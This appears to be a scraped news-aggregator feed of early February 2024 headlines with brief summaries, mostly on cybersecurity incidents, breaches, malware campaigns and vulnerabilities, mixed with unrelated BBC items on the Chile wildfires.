            In this Help Net Security video, Dan Erel, VP of Security at SeeMetrics, discusses NIST Cybersecurity Framework (CSF) 2.0. NIST CSF is based on existing standards, guidelines, and practices for organizations to manage and reduce cybersecurity risk better. It was designed to foster risk and cybersecurity management communications amongst internal and external organizational stakeholders. Read more: 10 cybersecurity frameworks you need to know about

            The post Exploring NIST Cybersecurity Framework 2.0 appeared first on Help Net Security.

            "

            Autosummary: "


            "Russia's Google" owner pulls out of home country

            government
            2024-02-06 https://www.bbc.co.uk/news/business-68213191
            Yandex has previously been accused of hiding information about the Ukraine war from the Russian public. "

            Autosummary: "


            10 must-read cybersecurity books for 2024

            ciber
            2024-02-06 https://www.helpnetsecurity.com/2024/02/06/cybersecurity-books-2024/

            Our list of cybersecurity books has been curated to steer your professional growth in 2024. This selection aims to provide comprehensive information security insights and knowledge, ensuring you stay ahead in your career learning journey throughout the year. Cyber for Builders: The Essential Guide to Building a Cybersecurity Startup Author: Ross Haleliuk Cyber for Builders provides an overview of the cybersecurity industry from entrepreneurial lenses, breaks down the role of various industry players, from investors … More

            The post 10 must-read cybersecurity books for 2024 appeared first on Help Net Security.

            "

            Autosummary: Author: Cesar Bravo, Desilda Toska. You’ll learn the most intriguing psychological principles exploited by attackers, including influence, manipulation, rapport, persuasion, and empathy, and gain insights into how attackers leverage technology to enhance their attacks using fake logins, email impersonation, fake updates, and executing attacks through social media. Moreover, the book is packed with mental models, notes, and advice to help early-stage cybersecurity founders get their ideas off the ground and solve problems young companies face around problem discovery, hiring, building products, and fundraising. "


            Recent SSRF Flaw in Ivanti VPN Products Undergoes Mass Exploitation

            exploits
            2024-02-06 https://thehackernews.com/2024/02/recently-disclosed-ssrf-flaw-in-ivanti.html
            A recently disclosed server-side request forgery (SSRF) vulnerability impacting Ivanti Connect Secure and Policy Secure products has come under mass exploitation. The Shadowserver Foundation said it observed exploitation attempts originating from more than 170 unique IP addresses that aim to establish a reverse shell, among others. The attacks exploit CVE-2024-21893 (CVSS "

            Autosummary: "


            IBM LinuxONE 4 Express protects sensitive private data

            Linux
            2024-02-06 https://www.helpnetsecurity.com/2024/02/06/ibm-linuxone-4-express/

            IBM announced IBM LinuxONE 4 Express, extending the latest performance, security and AI capabilities of LinuxONE to small and medium sized businesses and within new data center environments. The pre-configured rack mount system is designed to offer cost savings and to remove client guess work when spinning up workloads quickly and getting started with the platform to address new and traditional use cases such as digital assets, medical imaging with AI, and workload consolidation. Building … More

            The post IBM LinuxONE 4 Express protects sensitive private data appeared first on Help Net Security.

            "

            Autosummary: Activating the IBM Ecosystem for client success: With the IBM LinuxONE Ecosystem, including AquaSecurity, Clari5, Exponential AI, Opollo Technologies, Pennant and Spiking, IBM is working to provide solutions for today’s sustainability and cybersecurity challenges. “IBM brings the power of hybrid cloud and AI in the latest LinuxONE 4 system to a simple, easy to use format that fits in many data centers,” said Tina Tarquinio, VP, Product Management, IBM Z and LinuxONE. "


            Hackers Exploit Job Boards, Stealing Millions of Resumes and Personal Data

            exploits
            2024-02-06 https://thehackernews.com/2024/02/hackers-exploit-job-boards-in-apac.html
            Employment agencies and retail companies chiefly located in the Asia-Pacific (APAC) region have been targeted by a previously undocumented threat actor known as ResumeLooters since early 2023 with the goal of stealing sensitive data. Singapore-headquartered Group-IB said the hacking crew's activities are geared towards job search platforms and the theft of resumes, with as many as 65 "

            Autosummary: A majority of the compromised websites are based in India, Taiwan, Thailand, Vietnam, China, Australia, and Turkey, although compromises have also been reported from Brazil, the U.S., Turkey, Russia, Mexico, and Italy. "


            Hundreds missing as deadly Chile wildfires rage

            latam
            2024-02-06 https://www.bbc.co.uk/news/world-latin-america-68215354
            More than 120 people have been killed in the fires and the number of dead is expected to rise further. "

            Autosummary: "


            Verizon insider data breach hits over 63,000 employees

            financial
            2024-02-06 https://www.bleepingcomputer.com/news/security/verizon-insider-data-breach-hits-over-63-000-employees/
            Verizon Communications is warning that an insider data breach impacts almost half its workforce, exposing sensitive employee information. [...] "

            Autosummary: The data that was exposed varies per employee but could include: Full name Physical address Social Security number (SSN) National ID Gender Union affiliation Date of birth Compensation information However, this incident does not appear to impact customer information. "


            Criminal IP ASM: A new cybersecurity listing on Microsoft Azure

            ciber
            2024-02-06 https://www.bleepingcomputer.com/news/security/criminal-ip-asm-a-new-cybersecurity-listing-on-microsoft-azure/
            AI SPERA, a leader in Cyber Threat Intelligence (CTI)-based solutions, today announced that Criminal IP ASM (Attack Surface Management) is now available on the Microsoft Azure Marketplace. [...] "

            Autosummary: The search engine, catering to a diverse user base, is available in English, French, Arabic, Korean, and Japanese, and is utilized across 160 countries worldwide. "


            State of Malware 2024: What consumers need to know

            exploits government
            2024-02-06 https://www.malwarebytes.com/blog/personal/2024/02/state-of-malware-2024-what-consumers-need-to-know
            The State of Malware 2024 report covers some topics that are of special interest to home users: privacy, passwords, malvertising, banking Trojans, and Mac malware. "

            Autosummary: Passwords: Google and Microsoft made good on their promise to back passkeys, an encryption-based alternative to passwords that can’t be stolen, guessed, cracked, or phished. As home users, many of the threats we cover will only affect you second hand, such as disruptions after a company suffers a ransomware attack, or when your private information is sold online after a data breach. "


            Known ransomware attacks up 68% in 2023

            exploits ransomware
            2024-02-06 https://www.malwarebytes.com/blog/awareness/2024/02/known-ransomware-attacks-up-68-in-2023
            Big Game ransomware is just one of six threats resource-constrained IT teams need to pay attention to in 2024. "

            Autosummary: Its activity is built around evergreen techniques like phishing, software exploits, and password guessing, along with mature malicious technologies like info stealers, trojans, and ransomware. "


            Chinese hackers infect Dutch military network with malware

            exploits
            2024-02-06 https://www.bleepingcomputer.com/news/security/chinese-hackers-infect-dutch-military-network-with-malware/
            A Chinese cyber-espionage group breached the Dutch Ministry of Defence last year and deployed malware on compromised devices, according to the Military Intelligence and Security Service (MIVD) of the Netherlands. [...] "

            Autosummary: RAT malware survives firmware upgrades: During the follow-up investigation, a previously unknown malware strain named Coathanger, a remote access trojan (RAT) designed to infect Fortigate network security appliances, was also discovered on the breached network. "


            Data breach at French healthcare services firm puts millions at risk

            financial
            2024-02-06 https://www.bleepingcomputer.com/news/security/data-breach-at-french-healthcare-services-firm-puts-millions-at-risk/
            French healthcare services firm Viamedis suffered a cyberattack that exposed the data of policyholders and healthcare professionals in the country. [...] "

            Autosummary: Other service providers using Viamedis, including Carte Blanche Partenaires, Itelis, Kalixia, Santéclair, and Audiens, are expected to experience similar situations. "


            JetBrains warns of new TeamCity auth bypass vulnerability

            exploits government
            2024-02-06 https://www.bleepingcomputer.com/news/security/jetbrains-warns-of-new-teamcity-auth-bypass-vulnerability/
            JetBrains urged customers today to patch their TeamCity On-Premises servers against a critical authentication bypass vulnerability that can let attackers take over vulnerable instances with admin privileges. [...] "

            Autosummary: "


            Google says spyware vendors behind most zero-days it discovers

            exploits
            2024-02-06 https://www.bleepingcomputer.com/news/security/google-says-spyware-vendors-behind-most-zero-days-it-discovers/
            Commercial spyware vendors (CSV) were behind 80% of the zero-day vulnerabilities Google's Threat Analysis Group (TAG) discovered in 2023 and used to spy on devices worldwide. [...] "

            Autosummary: Those spyware vendors use the zero-day flaws to target journalists, activists, and political figures as directed by their customers, including governments and private organizations. "When we discover and patch vulnerabilities used in exploit chains, it not only protects users, but prevents CSVs from meeting their agreements to customers, preventing them from being paid, and increasing their costs to continue operating." "


            Commercial spyware vendors are behind most zero-day exploits discovered by Google TAG

            exploits
            2024-02-06 https://securityaffairs.com/158750/hacking/commercial-spyware-vendors-zero-day.html
            Google’s TAG revealed that Commercial spyware vendors (CSV) were behind most of the zero-day vulnerabilities discovered in 2023. The latest report published by Google Threat Analysis Group (TAG), titled “Buying Spying, an in-depth report with our insights into Commercial Surveillance Vendors (CSVs)”, warns of the rise of commercial spyware vendors and the risks to free […] "

            Autosummary: The latest report published by Google Threat Analysis Group (TAG), titled “Buying Spying, an in-depth report with our insights into Commercial Surveillance Vendors (CSVs)”, warns of the rise of commercial spyware vendors and the risks to free speech, the free press, and the open internet. "


            Former president of Chile dies in helicopter crash

            latam
            2024-02-06 https://www.bbc.co.uk/news/world-latin-america-68223520
            Sebastián Piñera became known abroad for overseeing the spectacular rescue of 33 miners in 2010. "

            Autosummary: "


            How cybersecurity strategies adapt to evolving threats

            ciber
            2024-02-05 https://www.helpnetsecurity.com/2024/02/05/cybersecurity-strategies-challenges-video/

            Cybersecurity strategies are essential components of modern organizations, designed to protect digital assets, sensitive information, and overall business continuity from potential cyber threats. As technology advances, the complexity and frequency of cyber attacks continue to grow, making it imperative for businesses to develop robust and adaptive cybersecurity strategies. In this round-up from Help Net Security, cybersecurity experts address various aspects of cybersecurity strategies and challenges. Complete videos Keith Neilson, Technical Evangelist at CloudSphere, illustrates how … More

            The post How cybersecurity strategies adapt to evolving threats appeared first on Help Net Security.

            "

            Autosummary: "


            New Mispadu Banking Trojan Exploiting Windows SmartScreen Flaw

            financial exploits
            2024-02-05 https://thehackernews.com/2024/02/new-mispadu-banking-trojan-exploiting.html
            The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico. The attacks entail a new variant of the malware that was first observed in 2019, Palo Alto Networks Unit 42 said in a report published last week. Propagated via phishing mails, Mispadu is a Delphi-based information stealer "

            Autosummary: Mispadu, once launched, reveals its true colors by selectively targeting victims based on their geographic location (i.e., Americas or Western Europe) and system configurations, and then proceeds to establish contact with a command-and-control (C2) server for follow-on data exfiltration. "


            Chile's Niemann beats Garcia on fourth play-off hole

            latam
            2024-02-05 https://www.bbc.co.uk/sport/golf/68201943
            Joaquin Niemann beats Sergio Garcia on a dramatic fourth play-off hole in near darkness to win the LIV Golf Mayakoba title in Mexico. "

            Autosummary: "


            Newest Ivanti SSRF zero-day now under mass exploitation

            exploits
            2024-02-05 https://www.bleepingcomputer.com/news/security/newest-ivanti-ssrf-zero-day-now-under-mass-exploitation/
            An Ivanti Connect Secure and Ivanti Policy Secure server-side request forgery (SSRF) vulnerability tracked as CVE-2024-21893 is currently under mass exploitation by multiple attackers. [...] "

            Autosummary: A security mess: The disclosure of CVE-2024-21893 came along with the release of security updates for two other zero-days impacting the same products, CVE-2023-46805 and CVE-2024-21887, which Ivanti first discovered on January 10, 2024, sharing temporary mitigations. "


            Deepfaked video conference call makes employee send $25 million to scammers

            financial
            2024-02-05 https://www.helpnetsecurity.com/2024/02/05/deepfake-video-conference-call/

            A deepfake video conference call paired with social engineering tricks has led to the theft of over US$25 million from a multinational firm, the South China Morning Post has reported. The scheme and the deepfake video conference call: The attack started with messages sent to several of the firm’s employees, but it seems that only one – employed in the finance department of the company’s Hong Kong branch – was ultimately bamboozled. According to the … More

            The post Deepfaked video conference call makes employee send $25 million to scammers appeared first on Help Net Security.

            "

            Autosummary: In the past, we would assume these scams would only involve two people in one-on-one situations, but we can see from this case that fraudsters are able to use AI technology in online meetings, so people must be vigilant even in meetings with lots of participants,” Chan Shun-ching said during a press event. "


            Varonis MDDR helps organizations prevent data breaches

            financial
            2024-02-05 https://www.helpnetsecurity.com/2024/02/05/varonis-mddr/

            Varonis introduced Varonis Managed Data Detection and Response (MDDR), a managed service dedicated to stopping threats at the data level. Unlike traditional MDR services that are endpoint- and network-centric, MDDR focuses on threats to data. The offering combines Varonis’ award-winning threat detection technology and automation with a global team of elite threat hunters, forensics analysts, and incident responders who investigate and respond to threats 24x7x365. “Organizations pay millions of dollars for threat detection products and … More

            Autosummary: “Organizations pay millions of dollars for threat detection products and services, yet when an incident occurs, they struggle to answer the most important question, ‘Was any data stolen?’” said Matt Radolec, Varonis VP of Incident Response and Cloud Operations.


            Patchwork Using Romance Scam Lures to Infect Android Devices with VajraSpy Malware

            financial exploits
            2024-02-05 https://thehackernews.com/2024/02/patchwork-using-romance-scam-lures-to.html
            The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called VajraSpy. Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between

            Autosummary: Privee Talk (com.priv.talk), MeetMe (com.meeete.org), Let’s Chat (com.letsm.chat), Quick Chat (com.qqc.chat), Rafaqat رفاق (com.rafaqat.news), Chit Chat (com.chit.chat), YohooTalk (com.yoho.talk), TikTalk (com.tik.talk), Hello Chat (com.hello.chat), Nidus (com.nidus.no or com.nionio.org), GlowChat (com.glow.glow), Wave Chat (com.wave.chat). Rafaqat رفاق is notable for the fact that it’s the only non-messaging app and was advertised as a way to access the latest news.


            Drone footage shows Chile forest fire devastation

            latam
            2024-02-05 https://www.bbc.co.uk/news/world-latin-america-68205132
            At least 112 people have been killed in Chile’s Valparaiso region.

            Autosummary:


            Belarusian National Linked to BTC-e Faces 25 Years for $4 Billion Crypto Money Laundering

            financial rusia-ucrania
            2024-02-05 https://thehackernews.com/2024/02/belarusian-national-linked-to-btc-e.html
            A 42-year-old Belarusian and Cypriot national with alleged connections to the now-defunct cryptocurrency exchange BTC-e is facing charges related to money laundering and operating an unlicensed money services business. Aliaksandr Klimenka, who was arrested in Latvia on December 21, 2023, was extradited to the U.S. If convicted, he faces a maximum penalty of 25 years in prison. BTC-e, which had

            Autosummary: Urban, who went by the aliases Sosa, Elijah, King Bob, Anthony Ramirez, and Gustavo Fring, is said to be a key member of the cybercrime group known as Scattered Spider, according to KrebsOnSecurity, as well as a "top member" of a broader cybercrime ecosystem that calls itself The Com.


            Microsoft Outlook December updates trigger ICS security alerts

            industry
            2024-02-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-december-updates-trigger-ics-security-alerts/
            Microsoft is investigating an issue that triggers Outlook security alerts when trying to open .ICS calendar files after installing December 2023 Patch Tuesday Office security updates. [...]

            Autosummary:


            Clorox counts the cost of cyberattack

            ciber
            2024-02-05 https://www.malwarebytes.com/blog/news/2024/02/clorox-counts-the-cost-of-cyberattack
            Clorox has reported losses of $49 million following a cyberattack in mid-2023.

            Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. When an organization refuses to pay, the attacking ransomware group will typically publish the organization’s details, along with its data, on their leak site, which are our main source of information about who did what to whom. Despite a business continuity plan, the incident resulted in wide-scale disruptions to the company’s operations throughout the quarter, which ended September 30, 2023.


            Could your Valentine be a scammer? How to avoid getting caught in a bad romance

            financial
            2024-02-05 https://www.welivesecurity.com/en/scams/online-dating-scams-avoid-getting-caught-bad-romance/
            With Valentine’s Day almost upon us, here’s some timely advice on how to prevent scammers from stealing more than your heart

            Autosummary: A journalist from the Guardian found out that through her Tinder profile, the app collected around 800 pages worth of data about her, including likes, interests, photos, friends, and romantic preferences. Whether that’s doing a bit of social media checking, meeting in person, asking questions that require specific knowledge, or asking for proof of identity – all of these things will give you that reassurance that tanned Caroline from Ohio really is tanned Caroline from Ohio, and not mousy Clive from Seattle. Far too commonly, online daters have fallen for fake sob stories that their online crush needs money to help pay for the medical bills of their sick relative, their fledgling business isn’t going as well as they hoped, or that they should take advantage of a once-in-a-lifetime investment opportunity. They may go on social media to find out more about their target’s hobbies, beliefs, and habits, using this information to give the illusion of common interests, helping to create an even stronger bond.


            At least 51 dead in Chile wildfires, say officials

            latam
            2024-02-04 https://www.bbc.co.uk/news/world-latin-america-68196048
            President Boric announced a state of emergency as forest fires scorched the Valparaíso region.

            Autosummary:


            Week in review: Windows Event Log zero-day, exploited critical Jenkins RCE flaw

            exploits
            2024-02-04 https://www.helpnetsecurity.com/2024/02/04/week-in-review-windows-event-log-zero-day-exploited-critical-jenkins-rce-flaw/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Prioritizing cybercrime intelligence for effective decision-making in cybersecurity In this Help Net Security interview, Alon Gal, CTO at Hudson Rock, discusses integrating cybercrime intelligence into existing security infrastructures. Proactive cybersecurity: A strategic approach to cost efficiency and crisis management In this Help Net Security interview, Stephanie Hagopian, VP of Security at CDW, discusses offensive strategies in the face of complex … More


            Autosummary: Hundreds of network operators’ credentials found circulating in Dark Web. Resecurity conducted extensive monitoring of the Dark Web, uncovering over 1,572 customers of RIPE, APNIC, AFRINIC, and LACNIC who were compromised due to malware activity involving well-known password stealers like Redline, Vidar, Lumma, Azorult, and Taurus. Global critical infrastructure faces relentless cyber activity In the last year, the world’s critical infrastructure – the medical, power, communications, waste, manufacturing, and transportation equipment that connects people and machines – has been under near-constant attack, according to Forescout.


            "It was like hell": Dozens killed in Chile wildfires

            latam
            2024-02-04 https://www.bbc.co.uk/news/world-latin-america-68197170
            Officials have warned the death toll is likely to rise as rescue teams reach the hardest hit areas.

            Autosummary:


            A cyberattack impacted operations at Lurie Children’s Hospital

            ciber
            2024-02-04 https://securityaffairs.com/158609/cyber-crime/lurie-childrens-hospital-cyberattack.html
            A cyber attack forced Lurie Children’s Hospital in Chicago to take IT systems offline with a severe impact on its operations. The Lurie Children’s Hospital in Chicago took IT systems offline after a cyberattack. The security incident severely impacted normal operations also causing the delay of medical care. Lurie Children’s Hospital is one of the […]

            Autosummary: Lurie Children’s Hospital offers a wide range of specialized medical services, including pediatric surgery, oncology, cardiology, neurology, and neonatology.


            Microsoft is bringing the Linux sudo command to Windows Server

            Linux
            2024-02-04 https://www.bleepingcomputer.com/news/microsoft/microsoft-is-bringing-the-linux-sudo-command-to-windows-server/
            Microsoft is bringing the Linux "sudo" feature to Windows Server 2025, offering a new way for admins to elevate privileges for console applications. [...]

            Autosummary: However, the sudo settings provide some clues as to how the command will work, with the ability to run sudo applications "In a new window", "With input disabled", and "Inline".


            US government imposed sanctions on six Iranian intel officials

            government
            2024-02-04 https://securityaffairs.com/158621/cyber-warfare-2/iranian-intel-officials-sanctions-critical-infrastructure.html
            The US government issued sanctions against six Iranian government officials linked to cyberattacks against critical infrastructure organizations. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has imposed sanctions on six Iranian government officials associated with cyberattacks targeting critical infrastructure organizations in the US and abroad. “Today, the Department of the Treasury’s Office of […]

            Autosummary: “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned six officials in the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), an Iranian government organization responsible for a series of malicious cyber activities against critical infrastructure in the United States and other countries.”


            Mastodon Vulnerability Allows Hackers to Hijack Any Decentralized Account

            exploits
            2024-02-03 https://thehackernews.com/2024/02/mastodon-vulnerability-allows-hackers.html
            The decentralized social network Mastodon has disclosed a critical security flaw that enables malicious actors to impersonate and take over any account. "Due to insufficient origin validation in all Mastodon, attackers can impersonate and take over any remote account," the maintainers said in a terse advisory. The vulnerability, tracked as CVE-2024-23832, has a severity rating of 9.4 out of

            Autosummary:


            Mastodon vulnerability allows attackers to take over accounts

            exploits
            2024-02-03 https://www.bleepingcomputer.com/news/security/mastodon-vulnerability-allows-attackers-to-take-over-accounts/
            Mastodon, the free and open-source decentralized social networking platform, has fixed a critical vulnerability that allows attackers to impersonate and take over any remote account. [...]

            Autosummary:


            Clorox estimates the costs of the August cyberattack will exceed $49 Million

            ciber
            2024-02-03 https://securityaffairs.com/158575/security/clorox-attack-costs-exceed-49m.html
            Cleaning products giant Clorox estimates the economic impact of the cyber attack that hit the company in August 2023 at $49 million. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household and professional cleaning, health, and personal care products. The cleaning product giant announced in mid-August […]

            Autosummary: Cleaning products giant Clorox estimates the economic impact of the cyber attack that hit the company in August 2023 at $49 million.


            Clorox says cyberattack caused $49 million in expenses

            ciber
            2024-02-03 https://www.bleepingcomputer.com/news/security/clorox-says-cyberattack-caused-49-million-in-expenses/
            Clorox has confirmed that a September 2023 cyberattack has so far cost the company $49 million in expenses related to the response to the incident. [...]

            Autosummary:


            AI will not be the destroyer of jobs, says Bank chief

            financial
            2024-02-02 https://www.bbc.co.uk/news/technology-68170068
            Bank of England governor says AI has "great potential" as Lords report urges UK to embrace AI.

            Autosummary:


            EU adopts first cybersecurity certification scheme for safer tech

            ciber
            2024-02-02 https://www.helpnetsecurity.com/2024/02/02/enisa-eucc-cybersecurity-certification-scheme/

            The European Commission adopted the implementing regulation concerning the EU cybersecurity certification scheme on Common Criteria (EUCC). The outcome aligns with the candidate cybersecurity certification scheme on EUCC that ENISA drafted in response to a request issued by the European Commission. In drafting the candidate scheme, ENISA was supported by an Ad-hoc working group (AHWG) composed of area experts from across the industry and EU Member States National Cybersecurity Certification Authorities (NCCAs). ENISA is grateful … More

            Autosummary: Voluntary-based, the new EUCC scheme allows ICT suppliers who wish to showcase proof of assurance to go through an EU commonly understood assessment process to certify ICT products such as technological components (chips, smartcards), hardware and software. EU Agency for Cybersecurity Executive Director Juhan Lepassaar underscored that “The adoption of the first cybersecurity certification scheme marks a milestone towards a trusted EU digital single market, and it is a piece of the puzzle of the EU cybersecurity certification framework that is currently in the making.”


            Cloudflare Breach: Nation-State Hackers Access Source Code and Internal Docs

            government
            2024-02-02 https://thehackernews.com/2024/02/cloudflare-breach-nation-state-hackers.html
            Cloudflare has revealed that it was the target of a likely nation-state attack in which the threat actor leveraged stolen credentials to gain unauthorized access to its Atlassian server and ultimately access some documentation and a limited amount of source code. The intrusion, which took place between November 14 and 24, 2023, and detected on November 23, was carried out "with the goal of

            Autosummary:


            Cloudzy Elevates Cybersecurity: Integrating Insights from Recorded Future to Revolutionize Cloud Security

            ciber
            2024-02-02 https://thehackernews.com/2024/02/cloudzy-elevates-cybersecurity.html
            Cloudzy, a prominent cloud infrastructure provider, proudly announces a significant enhancement in its cybersecurity landscape. This breakthrough has been achieved through a recent consultation with Recorded Future, a leader in providing real-time threat intelligence and cybersecurity analytics. This initiative, coupled with an overhaul of Cloudzy’s cybersecurity strategies, represents a major

            Autosummary: This sophisticated intelligence allows us to act promptly against threats like Ransomware, APT (Advanced Persistent Threats), C2 (Command and Control) servers, malware, and more. Upon thorough evaluation of these reports and confirmation that the implicated accounts are indeed conducting illegal activities and are not victims, Cloudzy systematically bans these accounts.


            INTERPOL Arrests 31 in Global Operation, Identifies 1,900+ Ransomware-Linked IPs

            exploits ransomware
            2024-02-02 https://thehackernews.com/2024/02/interpol-arrests-31-in-global-operation.html
            An INTERPOL-led collaborative operation targeting phishing, banking malware, and ransomware attacks has led to the identification of 1,300 suspicious IP addresses and URLs. The law enforcement effort, codenamed Synergia, took place between September and November 2023 in an attempt to blunt the "growth, escalation and professionalization of transnational cybercrime." Involving 60 law

            Autosummary:


            PurpleFox malware infected at least 2,000 computers in Ukraine

            exploits
            2024-02-02 https://securityaffairs.com/158494/malware/purplefox-malware-targets-ukraine.html
            The Computer Emergency Response Team in Ukraine (CERT-UA) reported that a PurpleFox malware campaign had already infected at least 2,000 computers in the country. The Computer Emergency Response Team in Ukraine (CERT-UA) is warning about a malware campaign that has infected at least 2,000 computers in the country with the PurpleFox malware (aka ‘DirtyMoe‘). “The […]

            Autosummary: The Computer Emergency Response Team in Ukraine (CERT-UA) reported that a PurpleFox malware campaign had already infected at least 2,000 computers in the country.


            FBI removes malware from hundreds of routers across the US

            exploits
            2024-02-02 https://www.malwarebytes.com/blog/news/2024/02/fbi-removes-malware-from-hundreds-of-routers-across-the-us
            The FBI has removed malware from hundreds of routers in an effort to disrupt threat actors linked to the Chinese government.

            Autosummary: The US Cybersecurity and Infrastructure Security Agency (CISA) warned US businesses in May 2023 about Volt Typhoon, an elite squadron of hackers with ties to the Chinese government, that targets high-value entities like governments, large corporations, and critical infrastructure.


            Russian APT28 Hackers Targeting High-Value Orgs with NTLM Relay Attacks

            rusia-ucrania
            2024-02-02 https://thehackernews.com/2024/02/russian-apt28-hackers-targeting-high.html
            Russian state-sponsored actors have staged NT LAN Manager (NTLM) v2 hash relay attacks through various methods from April 2022 to November 2023, targeting high-value targets worldwide. The attacks, attributed to an "aggressive" hacking crew called APT28, have set their eyes on organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with

            Autosummary: APT28 is also tracked by the broader cybersecurity community under the names Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.


            DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking

            exploits
            2024-02-02 https://thehackernews.com/2024/02/dirtymoe-malware-infects-2000-ukrainian.html
            The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe. The agency attributed the campaign to a threat actor it calls UAC-0027. DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March

            Autosummary: The attack is said to be related to a threat actor known as Shuckworm, which is also known as Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder.


            Lurie Children’s Hospital took systems offline after cyberattack

            ciber
            2024-02-02 https://www.bleepingcomputer.com/news/security/lurie-childrens-hospital-took-systems-offline-after-cyberattack/
            Lurie Children’s Hospital in Chicago was forced to take IT systems offline after a cyberattack, disrupting normal operations and delaying medical care in some instances. [...]

            Autosummary: "As Illinois’ leading provider for pediatric care, our overarching priority is to continue providing safe, quality care to our patients and the communities we serve," continues the hospital’s announcement.


            The Week in Ransomware - February 2nd 2024 - No honor among thieves

            exploits ransomware
            2024-02-02 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-2nd-2024-no-honor-among-thieves/
            Attacks on hospitals continued this week, with ransomware operations disrupting patient care as they force organizations to respond to cyberattacks. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @BleepinComputer, @billtoulas, @demonslay335, @serghei, @fwosar, @CyberArk, @coveware, @pcrisk, @USGAO, @Jon__DiMaggio, @ThierryBreton, @Truesec, @Analyst1, @AhnLab_SecuInfo, @RakeshKrish12, @Netenrich, @jgreigj, and @AJVicens. For hospitals, this means that they no longer have access to medical charts, can’t prescribe electronic prescriptions, respond to patients through online portals, or in some cases, access medical diagnostic reports. Most federal agencies that lead and manage risk for 4 critical sectors—manufacturing, energy, healthcare and public health, and transportation systems—have assessed or plan to assess risks associated with ransomware.


            Iranian hackers breached Albania’s Institute of Statistics (INSTAT)

            industry
            2024-02-02 https://securityaffairs.com/158555/hacking/iranian-hackers-hit-albania-instat.html
            Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. A sophisticated cyberattack on Wednesday hit Albania’s Institute of Statistics (INSTAT). The institute confirmed that the attack affected some of its systems. Albania’s Institute of Statistics (INSTAT) promptly activated emergency protocols to respond to the […]

            Autosummary: Albania’s cyber agency AKCESK is now collaborating with state… — The Record From Recorded Future News (@TheRecord_Media) February 2, 2024 In December 2023, Albania’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed that cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania.


            Grandoreiro banking malware disrupted – Week in security with Tony Anscombe

            financial exploits
            2024-02-02 https://www.welivesecurity.com/en/videos/grandoreiro-banking-malware-disrupted-week-in-security-with-tony-anscombe/
            The banking trojan, which targeted mostly Brazil, Mexico and Spain, blocked the victim’s screen, logged keystrokes, simulated mouse and keyboard activity and displayed fake pop-up windows

            Autosummary:


            Spotify’s content filter fails to block explicit lyrics in dozens of hits

            industry
            2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890?at_medium=RSS&at_campaign=KARANGA
            Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked.

            Autosummary:


            Custom rules in security tools can be a game changer for vulnerability detection

            exploits
            2024-02-01 https://www.helpnetsecurity.com/2024/02/01/isaac-evans-semgrep-custom-rules-security-tools/

            In this Help Net interview, Isaac Evans, CEO at Semgrep, discusses the balance between speed and thoroughness in CI/CD pipeline security scanning. Stressing the need to avoid slowing down the process, he recommends a nuanced approach, utilizing custom rules to tailor security findings to an organization’s coding practices. Evans also discusses the impact of a developer-first approach, the significance of minimizing false positives, and highlights the potential of modern security tools, particularly those integrating AI … More

            Autosummary: Evans also discusses the impact of a developer-first approach, the significance of minimizing false positives, and highlights the potential of modern security tools, particularly those integrating AI and secure code development guardrails. When presented with the developer-first approach described above, modern security tools can thus protect the organization from additional impact, and especially compared to legacy tools, significantly accelerate the time to issue resolution.


            Unpacking the challenges of AI cybersecurity

            ciber
            2024-02-01 https://www.helpnetsecurity.com/2024/02/01/ai-cybersecurity-challenges-video/

            As organizations handle increasing amounts of data daily, AI offers advanced capabilities that would be harder to achieve with traditional methods. In this Help Net Security video, Tyler Young, CISO at BigID, explores AI’s challenges, triumphs, and future in cybersecurity.

            Autosummary:


            CISA Warns of Active Exploitation of Critical Vulnerability in iOS, iPadOS, and macOS

            exploits
            2024-02-01 https://thehackernews.com/2024/02/cisa-warns-of-active-exploitation-of.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a high-severity flaw impacting iOS, iPadOS, macOS, tvOS, and watchOS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, tracked as CVE-2022-48618 (CVSS score: 7.8), concerns a bug in the kernel component. "An attacker with

            Autosummary:


            Threat actor used Vimeo, Ars Technica to serve second-stage malware

            exploits
            2024-02-01 https://www.helpnetsecurity.com/2024/02/01/vimeo-ars-technica-malware/

            A financially motivated threat actor tracked as UNC4990 is using booby-trapped USB storage devices and malicious payloads hosted on popular websites such as Ars Technica, Vimeo, GitHub and GitLab to surreptitiously deliver malware. Another interesting detail about UNC4990 is that it’s mostly targeting organizations located in Italy (particularly within the health, transportation, construction, and logistics sectors) and is likely based in that country, as well. “Based on the extensive use of Italian infrastructure throughout UNC4990 operations, including … More

